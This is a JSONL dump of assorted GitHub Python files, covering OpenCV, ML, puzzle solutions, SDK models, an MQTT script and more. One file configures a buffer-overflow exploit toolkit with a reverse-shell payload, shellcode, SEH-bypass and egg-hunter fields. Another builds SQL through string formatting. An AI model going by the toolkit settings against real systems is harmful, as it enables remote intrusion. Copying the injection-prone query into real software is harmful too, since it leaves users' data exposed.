cv2.VideoCapture(input_video_file)\ntotalframecount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))\nif totalframecount == 0:\n print(\"Error: Video file does exists or empty file!\")\n exit(-1)\nprint (f'Video [{input_video_file}] Frame count is {totalframecount}')\n\n#m.mp4 5 mkv 1\nwhile True:\n vidcap.set(1, frame_no ); # Where frame_no is the frame you want\n ret, frame = vidcap.read()\n frame = cv2.resize(frame, None, fx=scaling_factor,\n fy=scaling_factor, interpolation=cv2.INTER_AREA)\n cv2.imshow(vid_name, frame)\n\n\n c = cv2.waitKey(1)\n if c ==27: #esc\n break\n elif c == 115:# 's' save\n print(\"Save imge to \" + BASE_FOLDER+(frame_name) % frame_no)\n #cv2.imwrite(os.path.join(pathOut, \"frame{:d}.jpg\".format(count)), frame)\n # save frame as JPEG file\n frame01 = cv2.resize(frame, None, fx=1,\n fy=1, interpolation=cv2.INTER_AREA)\n cv2.imwrite(BASE_FOLDER+'/frame/'+(frame_name) % frame_no, frame01)\n\n elif c==117: # ('u') move up\n frame_no += frame_jump\n if frame_no > totalframecount : frame_no =0\n print(\"Move to frame number[{:d}]\".format(frame_no))\n elif c==102:# 'f' forward 1 frame\n frame_no += 1\n if frame_no > totalframecount : frame_no =0\n print(\"Move to frame number[{:d}]\".format(frame_no))\n elif c==98:# 'b'' backward 1 frame\n frame_no -= 1\n if frame_no < 0 : frame_no = totalframecount -1\n print(\"Move to frame number[{:d}]\".format(frame_no))\n elif c==100: # ('d') move down\n frame_no -= frame_jump\n if frame_no < 0 : frame_no = totalframecount -1\n print(\"Move to frame number[{:d}]\".format(frame_no))\n","repo_name":"danizalm05/python01","sub_path":"opencv/ComputerVision/video/extract_frames.py","file_name":"extract_frames.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2915801885","text":"import database, datetime, trip\r\n\r\nclass car(object):\r\n def __init__(self, vin=None, model=None):\r\n self.vin = vin\r\n self.model = model\r\n self.trips = list()\r\n self.trips = self._getTrips()\r\n\r\n def _getTrips(self):\r\n trips = list()\r\n tripPoints = self._getTripPoints()\r\n # There must be at least 2 trip points for one complete trip\r\n if len(tripPoints) > 1:\r\n start = {\"lat\": tripPoints[0][0], \"lon\": tripPoints[0][1]}\r\n start['lat'] = float(start['lat'])\r\n start['lon'] = float(start['lon'])\r\n time_start = tripPoints[0][2]\r\n i3 = 0\r\n for point in tripPoints[1:]:\r\n i3 += 1\r\n end = {\"lat\": point[0], \"lon\": point[1]}\r\n end['lat'] = float(end['lat'])\r\n end['lon'] = float(end['lon'])\r\n idle = datetime.datetime.strptime(point[3], \"%Y-%m-%d %H:%M:%S.%f\") - datetime.datetime.strptime(point[2], \"%Y-%m-%d %H:%M:%S.%f\")\r\n # Only append trip if trip doesn't exist yet\r\n if any(trip.time_start == time_start and trip.time_end == point[2] for trip in self.trips) == False:\r\n t = trip.trip(start, end, time_start, point[2], idle, self.model, self.vin)\r\n trips.append(t)\r\n start = end\r\n time_start = point[3]\r\n return trips\r\n\r\n\r\n def _getTripPoints(self):\r\n query = \"SELECT lat, lon, timestamp as datetime, timestamp_end as datetime FROM %s WHERE vin = '%s' AND timestamp_end IS NOT '' ORDER BY timestamp\"% (self.model.location,self.vin[0])\r\n trip_points = database.selectDataObjects(query, self.model.location)\r\n return trip_points\r\n","repo_name":"oliverdlugosch/UserBasedRelocation","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21349570358","text":"from tree import RGBXmasTree\nfrom colorzero import Color\nimport time\n# Write your program below\n\ntree = RGBXmasTree()\ninterval = 2\nstarLight = tree.star()\n\nwhile True:\n try:\n starLight.on()\n time.sleep(interval)\n starLight.off()\n time.sleep(interval)\n except KeyboardInterrupt:\n break\n\ntree.off()\n\n# Write your program above this line\ntree.close()","repo_name":"HSSBoston/raspi-python","sub_path":"projects/xmas-tree-3drgb/star-on-off.py","file_name":"star-on-off.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36290701918","text":"import logging\n\nimport aiohttp\nfrom galaxy.api.errors import UnknownBackendResponse\nfrom galaxy.http import handle_exception, create_client_session\n\nOAUTH_LOGIN_REDIRECT_URL = \"https://www.playstation.com/\"\n\nOAUTH_LOGIN_URL = \"https://web.np.playstation.com/api/session/v1/signin\" \\\n \"?redirect_uri=https://io.playstation.com/central/auth/login\" \\\n \"%3FpostSignInURL={redirect_url}\" \\\n \"%26cancelURL={redirect_url}\" \\\n \"&smcid=web:pdc\"\n\nOAUTH_LOGIN_URL = OAUTH_LOGIN_URL.format(redirect_url=OAUTH_LOGIN_REDIRECT_URL)\n\nREFRESH_COOKIES_URL = OAUTH_LOGIN_URL\n\nDEFAULT_TIMEOUT = 30\n\n\nclass CookieJar(aiohttp.CookieJar):\n def __init__(self):\n super().__init__()\n self._cookies_updated_callback = None\n\n def set_cookies_updated_callback(self, callback):\n self._cookies_updated_callback = callback\n\n def update_cookies(self, cookies, *args):\n super().update_cookies(cookies, *args)\n if cookies and self._cookies_updated_callback:\n self._cookies_updated_callback(list(self))\n\n\nclass HttpClient:\n\n def __init__(self):\n self._cookie_jar = CookieJar()\n self._session = create_client_session(cookie_jar=self._cookie_jar)\n\n async def close(self):\n await self._session.close()\n\n async def _request(self, method, url, *args, **kwargs):\n with handle_exception():\n return await self._session.request(method, url, *args, **kwargs)\n\n async def get(self, url, *args, **kwargs):\n silent = kwargs.pop('silent', False)\n get_json = kwargs.pop('get_json', True)\n response = await self._request(\"GET\", *args, url=url, **kwargs)\n try:\n raw_response = '***' if silent else await response.text()\n logging.debug(\"Response for:\\n{url}\\n{data}\".format(url=url, data=raw_response))\n return await response.json() if get_json else await response.text()\n except ValueError:\n logging.exception(\"Invalid response data for:\\n{url}\".format(url=url))\n raise UnknownBackendResponse()\n\n async def post(self, url, *args, **kwargs):\n logging.debug(\"Sending data:\\n{url}\".format(url=url))\n response = await self._request(\"POST\", *args, url=url, **kwargs)\n logging.debug(\"Response for post:\\n{url}\\n{data}\".format(url=url, data=await response.text()))\n return response\n\n def set_cookies_updated_callback(self, callback):\n self._cookie_jar.set_cookies_updated_callback(callback)\n\n def update_cookies(self, cookies):\n self._cookie_jar.update_cookies(cookies)\n\n async def refresh_cookies(self):\n await self.get(REFRESH_COOKIES_URL, silent=True, get_json=False)\n","repo_name":"Cloud-AC/galaxy-integration-psn","sub_path":"src/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"23772520693","text":"#\n# @lc app=leetcode id=876 lang=python3\n#\n# [876] Middle of the Linked List\n#\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nfrom typing import Optional\n\n# @lc code=start\n# Definition for singly-linked list.\n\n\nclass Solution:\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n # rabbit = head\n hare = head\n\n while hare and hare.next:\n head = head.next\n hare = hare.next.next\n \n return head\n\n \n# @lc code=end\n\n","repo_name":"SilasStokes/leetcode","sub_path":"python/876.middle-of-the-linked-list.py","file_name":"876.middle-of-the-linked-list.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20721987891","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pdb\nfrom pandas import *\nfrom scipy import stats # for linear regression \nfrom sklearn import datasets\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn import linear_model\n#********************************\ndata = read_csv('rpifinaldata.csv')\nt = data['Date/Time']\nx = data['CPU usage %']\ny = data['Temperature C'] \n#********************************\nf1 = plt.figure(1)\n\nX = data.loc[:, 'CPU usage %':'Temperature C']\nlr = linear_model.LinearRegression()\npredicted = cross_val_predict(lr,X,y,cv=10) \n\nplt.scatter(y,predicted,c='y',marker='o',edgecolors=(0,0,0))\nplt.plot([y.min(),y.max()], [y.min(),y.max()], lw=3)\n\nplt.xlabel('Temperature C')\nplt.ylabel('predicted')\nplt.title('Cross-Validation Prediction')\n#***************Method two*********************\nf2 = plt.figure(2)\n# subtitute X with x.reshape(-1,1) CPU data only\nlr = linear_model.LinearRegression()\npredicted = cross_val_predict(lr,x.reshape(-1,1),y,cv=10) \n\nplt.scatter(y,predicted,c='y',marker='o',edgecolors=(0,0,0))\nplt.plot([y.min(),y.max()], [y.min(),y.max()], lw=3)\n\nplt.xlabel('Temperature C')\nplt.ylabel('predicted')\nplt.title('Cross-Validation Prediction')\nplt.show()\n","repo_name":"AbdullahAlnutayfat/EE-629-A","sub_path":"finalproject/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30995649341","text":"import operator\n\nfrom collections import Counter, defaultdict, deque, OrderedDict\nfrom contextlib import suppress\nfrom functools import reduce\nfrom itertools import accumulate, combinations_with_replacement, count, islice\nfrom math import sqrt\n\nfrom .primes import factors, is_factor, is_prime, prime_factors, primes\n\n\nCOLLATZ_CACHE = {\n 1: (1, 1),\n}\n\n\ndef _populate_collatz_cache(n):\n subchain = OrderedDict()\n while n not in COLLATZ_CACHE.keys():\n nxt = (3*n + 1) if (n&1) else (n//2)\n subchain[n] = n = nxt\n\n base_ln = COLLATZ_CACHE[n][1]\n subchain = {\n n: (nxt, i+base_ln)\n for i, (n, nxt) in enumerate(reversed(subchain.items()), start=1)\n }\n COLLATZ_CACHE.update(subchain)\n\n\ndef collatz(n):\n \"\"\"\n Generate the Collatz sequence for a given starting integer n\n \"\"\"\n if n not in COLLATZ_CACHE:\n _populate_collatz_cache(n)\n\n while True:\n yield n\n if n == 1:\n break\n n, _ = COLLATZ_CACHE[n]\n\n\ndef collatz_length(n):\n \"\"\"\n Return the length of the Collatz chain for a given starting integer n\n \"\"\"\n if n not in COLLATZ_CACHE:\n _populate_collatz_cache(n)\n\n _, ln = COLLATZ_CACHE[n]\n return ln\n\n\ndef columns(matrix):\n \"\"\"\n Shorcut for forming a generator over the columns of a matrix\n \"\"\"\n return (c for c in transpose(matrix))\n\n\ndef diagonals(matrix, forward=True):\n \"\"\"\n Iterate over the diagonals of a 2-D matrix\n \"\"\"\n diags = defaultdict(deque)\n for i, row in enumerate(reversed(matrix)):\n if not forward:\n row = reversed(row)\n for j, n in enumerate(row):\n diags[i+j].appendleft(n)\n return (diag for _, diag in sorted(diags.items()))\n\n\ndef digits(count):\n \"\"\"\n Generate all of the numbers with the specified digit count\n \"\"\"\n return range(10**(count - 1), 10**count)\n\n\ndef even(seq):\n \"\"\"\n Pull out the even terms of a sequence\n \"\"\"\n return (n for n in seq if n % 2 == 0)\n\n\ndef fibonacci(a=1, b=1, terms=None, limit=None, inclusive=False):\n \"\"\"\n Generate the fibonacci sequence\n\n The starting terms can be specified and the sequence will continue up to\n the specified term, or stop below the limit, whichever comes first. The\n limit can be made inclusive.\n If term and limit are not specified it will continue indefinitely.\n \"\"\"\n i = 0\n if inclusive and limit is not None:\n limit += 1\n while True:\n if limit is not None and a >= limit:\n break\n elif terms is not None:\n if i >= terms:\n break\n yield a\n a, b = b, a+b\n i += 1\n\n\ndef is_palindrome(i):\n \"\"\"\n Determine whether the argument is a palindrome\n \"\"\"\n i_string = str(i)\n if i_string == i_string[::-1]:\n return True\n return False\n\n\ndef lcm(limit, inclusive=False):\n \"\"\"\n Find the lowest common multiple of all numbers below the limit\n\n Can be made inclusive of the limit.\n \"\"\"\n if inclusive:\n limit += 1\n signature = {}\n for i in range(limit):\n if is_prime(i):\n factors = Counter([i])\n else:\n factors = Counter(prime_factors(i))\n signature.update(\n {\n p: c\n for p, c in factors.items()\n if c > signature.get(p, 0)\n }\n )\n return product(p ** c for p, c in signature.items())\n\n\ndef multiples(factors, limit, inclusive=False):\n \"\"\"\n Find the multiples of factors below a certain limit\n\n Can be made inclusive so that it finds the multiples up to and\n including the limit. Implemented by checking if any of the factors\n are a factor of every number up to the limit.\n \"\"\"\n if inclusive:\n limit += 1\n for i in range(1, limit):\n if any(is_factor(f, i) for f in factors):\n yield i\n\n\ndef odd(seq):\n \"\"\"\n Pull out the odd terms of a sequence\n \"\"\"\n return (n for n in seq if n % 2 != 0)\n\n\ndef paths(n):\n \"\"\"\n Calculate the paths through a lattice of size n*n\n \"\"\"\n def get_moves(x, y):\n if x < n:\n yield (x+1, y)\n if y < n:\n yield (x, y+1)\n\n def count_paths(x, y):\n moves = get_moves(x, y)\n with suppress(StopIteration):\n move = next(moves)\n yield from count_paths(*move)\n move = next(moves)\n yield from count_paths(*move)\n yield 1\n\n start = (0, 0)\n path_count = 1 + sum(count_paths(*start))\n return path_count\n\n\ndef power_digit_sum(power, base=2):\n \"\"\"\n Calculate the sum of the digits given by raising base to a certain power\n \"\"\"\n return sum(int(d) for d in str(base**power))\n\n\ndef product(seq):\n \"\"\"\n Calculate the product of a sequence\n\n The multiplicative equivalent of the builtin sum function.\n \"\"\"\n return reduce(operator.mul, seq, 1)\n\n\ndef products(seq):\n \"\"\"\n Generate the products of every pairwise combination of terms of a sequence\n \"\"\"\n return (a*b for a, b in combinations_with_replacement(seq, 2))\n\n\ndef pythagorean_triplet(c):\n \"\"\"\n Derive the pythagorean triplet belonging to a given hypotenuse\n\n Returns an empty tuple if the hypotenuse does not belong to a pythagorean\n triplet.\n \"\"\"\n c_squared = c**2\n for a in range(1, c):\n b = sqrt(c_squared - (a**2))\n if b.is_integer():\n return (a, int(b), c)\n return tuple()\n\n\ndef rows(matrix):\n \"\"\"\n Shortcut for forming a generator over the rows of a matrix\n \"\"\"\n return (r for r in matrix)\n\n\ndef sliding_window(seq, size=1, bounded=False):\n \"\"\"\n Generate succesive windows of a given size across a sequence\n\n The window will slide to the end of the sequence at which point it will\n reduce in size to zero as it runs out of terms. If the window is bigger\n than the sequence it will behave as if it is already at the end, i.e. it\n will start to tail off straight away.\n\n If stricter behaviour is required the bounded keyword can be set to True,\n in which case each window will contain exactly size number of terms; it\n will not tail off and must be smaller than or equal to the size of the\n sequence itself.\n \"\"\"\n if bounded:\n seq = list(seq)\n seq_len = len(seq)\n for i, _ in enumerate(seq):\n window_limit = i + size\n if bounded and window_limit > seq_len:\n break\n yield islice(seq, i, i+size)\n\n\ndef squares(seq):\n \"\"\"\n Generate squares for each term in a sequence\n \"\"\"\n return (n**2 for n in seq)\n\n\ndef square_sum(seq):\n \"\"\"\n Find the square of the sum of the terms of a sequence\n \"\"\"\n return sum(seq)**2\n\n\ndef sum_squares(seq):\n \"\"\"\n Find the sum of the squares of the terms of a sequence\n \"\"\"\n return sum(squares(seq))\n\n\ndef transpose(matrix):\n \"\"\"\n Transpose a 2-D matrix\n \"\"\"\n return zip(*matrix)\n\n\ndef triangular_numbers(terms=None, limit=None, inclusive=False):\n \"\"\"\n Generate the triangular numbers up to a given limit or term\n\n Can be made inclusive of the limit.\n \"\"\"\n if limit and inclusive:\n limit += 1\n for i, n in enumerate(accumulate(count(1)), 1):\n limit_reached = limit is not None and n >= limit\n terms_reached = terms is not None and i > terms\n if limit_reached or terms_reached:\n break\n yield n\n","repo_name":"mchlrhw/project-euler-python","sub_path":"euler/lib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21003561124","text":"import random\nimport pygame as pg\nclass Boid:\n def __init__(self, velX, velY, screenwidth, screenheight):\n self.radius = random.randint(5, 15)\n self.position = pg.math.Vector2(random.randrange(screenwidth), random.randrange(screenheight))\n self.velocity = pg.math.Vector2(0, 0)\n self.acceleration = pg.math.Vector2(0, 0)\n self.velocity.x, self.velocity.y = velX, velY\n self.maxForce = 0.010\n\n def wrap(self, x, y):\n if self.position.x > x:\n self.position.x = 0\n\n if self.position.x < 0:\n self.position.x = x\n\n if self.position.y > y:\n self.position.y = 0\n\n if self.position.y < 0:\n self.position.y = y\n\n def alignment(self, boids, radius):\n pos = []\n total = 0\n for boid in boids:\n if boid != self and self.position.distance_to(boid.position) < radius:\n pos.append(boid.velocity)\n total += 1\n\n sum = pg.math.Vector2(0, 0)\n for p in pos:\n sum += p\n\n if total != 0:\n sum = sum / total\n steerin = sum - self.velocity\n if(steerin.magnitude()!=0):\n steerin = steerin.normalize()*self.maxForce*1.6\n self.acceleration += steerin\n\n def cohesion(self, boids, radius):\n pos = pg.math.Vector2(0, 0)\n total = 0\n for boid in boids:\n if boid != self and self.position.distance_to(boid.position) < radius:\n pos += boid.position\n total += 1\n\n if total != 0:\n sum = pos / total\n steerin = sum - self.position\n if(steerin.magnitude()!=0):\n steerin = steerin.normalize()*self.maxForce*2\n self.acceleration += steerin\n\n def separation(self, boids, radius):\n pos = pg.math.Vector2(0, 0)\n total = 0\n for boid in boids:\n if boid != self and self.position.distance_to(boid.position) < radius and self.position.distance_to(boid.position)>0:\n diff = self.position - boid.position\n diff /= self.position.distance_to(boid.position)\n pos += diff\n total += 1\n\n if total != 0:\n sum = pos / total\n steerin = sum\n if(steerin.magnitude()!=0):\n steerin -= self.velocity\n steerin = steerin.normalize()*self.maxForce*2.5\n self.acceleration += steerin","repo_name":"KillyTheCat/pyBoids","sub_path":"boid.py","file_name":"boid.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18361459179","text":"import os\nimport sys\n\nclass Config:\n\n localip = \"192.168.105.1\"\n localport = 7777\n verbose_lv = 2\n\n remoteip = \"\"\n remoteport = 0\n mode = \"\"\n field = \"\"\n platform = \"windows\"\n reverse = \"windows/shell_reverse_tcp\"\n\n http_method = \"HEAD\"\n http_uri = \"\"\n\n user = \"anonymous\"\n passwd = \"123@test.com\"\n\n fuzzer_type = \"\"\n fuzzer_buffer = \"A\"\n offset = 1\n overflow = 0\n\n session_ignore = False\n\n badchars = \"\"\n shellcode = \"\"\n\n # jmpesp_add = \"\"\n # eip = \"\"\n # esp = \"\"\n # buffer = \"\"\n\n #################################\n # SEHByPass Attributes\n\n # offset = 1\n nextseh = \"\"\n seh = \"\"\n ppr_address = \"\"\n # payload = \"D\" * 400\n # nops = 0\n skip_seh = \"\" # \"\\x90\\x90\\xeb\\x06\"\n\n #################################\n # EggHunter Attributes\n\n #offset = 1\n # eip = \"B\" * 4\n # esp = \"C\" * 4\n payload = \"\"\n nops = 0\n jmpesp_add = \"\"\n instruction = \"\" # \"\\xeb\\xca\" #jmp short\n # hunter = \"\"\n egg = \"T00WT00W\"\n src_address = \"\"\n dest_address = \"\"\n\n\n","repo_name":"danieljs777/fastoverflowtk","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"1117612385","text":"from modules.Connection import Connection\nimport requests\n\n\nclass TestConnection:\n def test_vcsa_connect(self, setup_vcsa_url):\n response = requests.get(setup_vcsa_url)\n assert response.status_code == 200, 'Response code 200 from the vcsa-exporter expected!'\n\n def test_login_success(self, setup_vcenter, session_id):\n setup_vcenter.login()\n assert setup_vcenter.con.session_id == session_id,\\\n 'After a login the presence of the correct session ID is expected.'\n\n def test_logout_success(self, setup_vcenter):\n connection = Connection(setup_vcenter)\n connection.login()\n response = connection.logout()\n assert response is True, 'Expected the response \"True\" for a successful logout.'\n\n def test_login_failure(self, setup_vcenter):\n connection = Connection(setup_vcenter)\n connection.pw = 'False'\n response = connection.login()\n assert response is False, 'Expected the response \"False\" for a failed login.'\n\n def test_logout_failure(self, setup_vcenter):\n connection = Connection(setup_vcenter)\n connection.session_id = 'False'\n response = connection.logout()\n assert response is False, 'Expected the response \"False\" for a failed logout.'\n","repo_name":"sapcc/vcsa-exporter","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"1739647804","text":"import json\nimport paho.mqtt.client as mqtt\n\n# Connect to the MQTT broker\nclient = mqtt.Client()\n\nif client.connect(\"0.0.0.0\", 1883, 60)!=0:\n print(\"could not connect to mqqt broker!\")\n import sys\n sys.exit(-1)\n\n# Create the message\nmessage = {\n \"dateHour\": \"2023-05-08T14:40:00\",\n \"gpsSpeed\": 60,\n \"gpsSatCount\": 8,\n \"Gear\": \"3\",\n \"Brake_pedal\": 0.5,\n \"Accel_pedal\": 0.8\n}\njson_message = json.dumps(message)\n\n# Publish the message to the \"vehicle/sensor_data\" topic\nclient.publish(\"vehicle/sensor_data\", json_message)\n\n# Disconnect from the broker\nclient.disconnect()\n","repo_name":"batuan/jems9_gcp_iot_project","sub_path":"script/pusht_to_hivemq.py","file_name":"pusht_to_hivemq.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12201455927","text":"# coding: utf-8\nimport pprint\nimport six\nfrom enum import Enum\nfrom . import AbstractHumanUserUpdate\n\n\nclass HumanUserCreate(AbstractHumanUserUpdate):\n\n swagger_types = {\n \n 'primary_account': 'int',\n }\n\n attribute_map = {\n 'primary_account': 'primaryAccount',\n }\n\n \n _primary_account = None\n\n def __init__(self, **kwargs):\n self.discriminator = None\n \n self.primary_account = kwargs.get('primary_account', None)\n super().__init__(**kwargs)\n self.swagger_types.update(super().swagger_types)\n self.attribute_map.update(super().attribute_map)\n\n \n @property\n def primary_account(self):\n \"\"\"Gets the primary_account of this HumanUserCreate.\n\n The primary account that the user belongs to.\n\n :return: The primary_account of this HumanUserCreate.\n :rtype: int\n \"\"\"\n return self._primary_account\n\n @primary_account.setter\n def primary_account(self, primary_account):\n \"\"\"Sets the primary_account of this HumanUserCreate.\n\n The primary account that the user belongs to.\n\n :param primary_account: The primary_account of this HumanUserCreate.\n :type: int\n \"\"\"\n\n self._primary_account = primary_account\n \n\n def to_dict(self):\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n elif isinstance(value, Enum):\n result[attr] = value.value\n else:\n result[attr] = value\n if issubclass(HumanUserCreate, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n return self.to_str()\n\n def __eq__(self, other):\n if not isinstance(other, HumanUserCreate):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"wallee-payment/python-sdk","sub_path":"wallee/models/human_user_create.py","file_name":"human_user_create.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"40701761235","text":"import math\nimport time\n\n\nclass Solution(object):\n def romanToInt(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if (0 == len(s)):\n return 0\n iResult = 0\n dcRoman = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500,\n \"M\": 1000}\n sRoman = s\n\n for iIndex in range(len(sRoman) - 1):\n iCur = dcRoman[sRoman[iIndex]]\n iNext = dcRoman[sRoman[iIndex + 1]]\n if (iCur < iNext):\n iResult -= iCur\n else:\n iResult += iCur\n print(iCur, iNext, iResult)\n\n iResult += dcRoman[sRoman[-1]]\n return iResult\n\n\ndef main():\n sRoman = \"III\"\n # sRoman = \"MCMXCIV\"\n solution = Solution()\n\n fStart = time.time()\n print(solution.romanToInt(sRoman))\n fStop = time.time()\n print(\"time: \", (fStop - fStart) * 1000, \"ms\")\n # print(solution.judgePrime(4))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jaysimon/leetcode","sub_path":"junior/07-math/03-romanToInt.py","file_name":"03-romanToInt.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18870762168","text":"import json\nimport boto3\n\n\ndef handler(event, context):\n movie = json.loads(event['body'])\n item = {\n 'code': movie['code'], #Código identificador de la película\n 'title': movie['title'], # Titulo película\n 'genre': movie['genre'] # Género película\n }\n\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('MoviesTable')\n result = table.put_item(Item=item)\n\n body = {\n \"message\": \"create\",\n \"input\": movie\n }\n\n response = {\n \"statusCode\": result['ResponseMetadata']['HTTPStatusCode'], #200\n \"headers\": {\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'OPTIONS, PUT'\n },\n \"body\": json.dumps(body)\n }\n\n return response","repo_name":"ServerlessTrIT/practica-final-aws-oscar-gz","sub_path":"backend/movies/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39324303777","text":"from . import dispatcher\nfrom . import utils\nfrom . import matrices\nimport joblib\nimport pandas as pd\n\n\nclass Train:\n def __init__(self,\n dataframe: pd.DataFrame , \n train_cfg: dict) -> None:\n \n self.dataframe = dataframe\n self.train_cfg = train_cfg\n self.clf = []\n self.clf_path = []\n self.predictions = None\n self.residuals = None\n self.goodness_of_fit = None\n \n\n def train(self):\n \"\"\"\n The functions takes in Training DataFrame and Train Config.\n Split the DataFrame in Train and Validation sets.\n Trains a model according to config and store it in the output path. \n\n Args:\n dataframe (pd.DataFrame): Training DataFrame\n train_cfg (dict): The dictinoary should have the following fromat\n KEEP THE KEY VALUES AS GIVEN BELOW!!!\n \n training: {\n model: \n \"logistic\" for Logistic Regression\n \"linear\" for Liner Regression\n }\n\n Returns:\n str: the path to the trained classifier.\n \"\"\"\n first = True\n for fold in range(self.train_cfg['num_folds']):\n # get the Training and validation data for this fold\n # training data is where the kfold is not equal to the fold\n # validation data is where the kfold is equal to the fold\n train_df = self.dataframe[self.dataframe.kfold != fold].reset_index(drop=True)\n val_df = self.dataframe[self.dataframe.kfold==fold].reset_index(drop=True)\n \n # drop the kfold and target column \n # convert it into a numpy array\n x_train = train_df.drop(['kfold'] + self.train_cfg['target_cols'],axis=1).values\n y_train = train_df[self.train_cfg['target_cols']].values\n # perform the same for validation\n x_val = val_df.drop(['kfold'] + self.train_cfg['target_cols'],axis=1).values\n # TODO: works only if you have single taget column\n # TODO: find a way to make it generic for n number of target columns\n y_val = val_df[self.train_cfg['target_cols']].values[:,0]\n \n # fetch the model from the model dispatcher\n clf = dispatcher.models[self.train_cfg['model']]\n \n #fit the model on the training data\n clf.fit(x_train,y_train)\n \n # create probabilities for validation samples\n preds = clf.predict_proba(x_val)[:,1]\n res = y_val - preds\n scores = matrices.metrics(y_val,preds)\n \n if first:\n self.predictions = preds\n self.residuals = res\n self.goodness_of_fit = scores\n first = False\n else:\n self.predictions += preds\n self.residuals += res\n self.goodness_of_fit = {key: self.goodness_of_fit[key]+scores[key] for key in scores.keys()}\n\n # save the model along with fold number\n clf_path = f\"{self.train_cfg['output_path']}/{self.train_cfg['model']}_{fold}.pkl\"\n joblib.dump(clf,clf_path)\n \n self.clf.append(clf)\n self.clf_path.append(clf_path)\n \n self.predictions /= len(self.clf)\n self.residuals /= len(self.clf)\n self.goodness_of_fit = {key: self.goodness_of_fit[key]/len(self.clf) for key in self.goodness_of_fit.keys()}\n \n \n utils.scatter_plot(x_data=self.predictions,\n y_data=self.residuals,\n title=f\"Residuals_Vs_FittedValues\",\n x_title=\"Predictions\",\n y_title=\"Residuals\",\n output_path=f\"{self.train_cfg['output_path']}/Residuals_Vs_Fitted_Values.html\")\n \n return self.clf, self.clf_path \n \n def get_metrics(self) -> dict:\n return self.goodness_of_fit","repo_name":"yash276/mlTemplate","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"28108671397","text":"import tkinter as tk\nimport PIL\nfrom PIL import ImageTk, Image # Pillow is needed.\n\ndef load_image(canvas, filepath, bounds=None):\n \"\"\"Takes a tk.Canvas and a filepath, loads image into canvas\"\"\"\n\n image_data = Image.open(filepath)\n if bounds:\n image_data.thumbnail(bounds, PIL.Image.ANTIALIAS)\n canvas.image = ImageTk.PhotoImage(image_data)\n canvas.create_image(0, 0, image=canvas.image, anchor=tk.NW)\n\nclass ImageFrame(tk.Frame):\n \"\"\"A frame for adding images to GUI.\"\"\"\n\n def __init__(\n self,\n parent,\n image=None,\n width=265,\n height=370,\n *args,\n **kwargs):\n\n self.parent = parent\n self.image = image\n self.width = width\n self.height = height\n tk.Frame.__init__(self, parent, *args, **kwargs)\n self.canvas_frame = tk.Frame(self)\n\n self.canvas = tk.Canvas(\n self.canvas_frame,\n width=self.width,\n height=self.height\n )\n self.canvas.pack(side = tk.LEFT)\n if self.image:\n load_image(self.canvas, self.image)\n self.canvas_frame.pack()\n\n def load_image(self, imagepath, width=None, height=None):\n \"\"\"Loads new image into canvas, updating size if needed.\"\"\"\n\n if 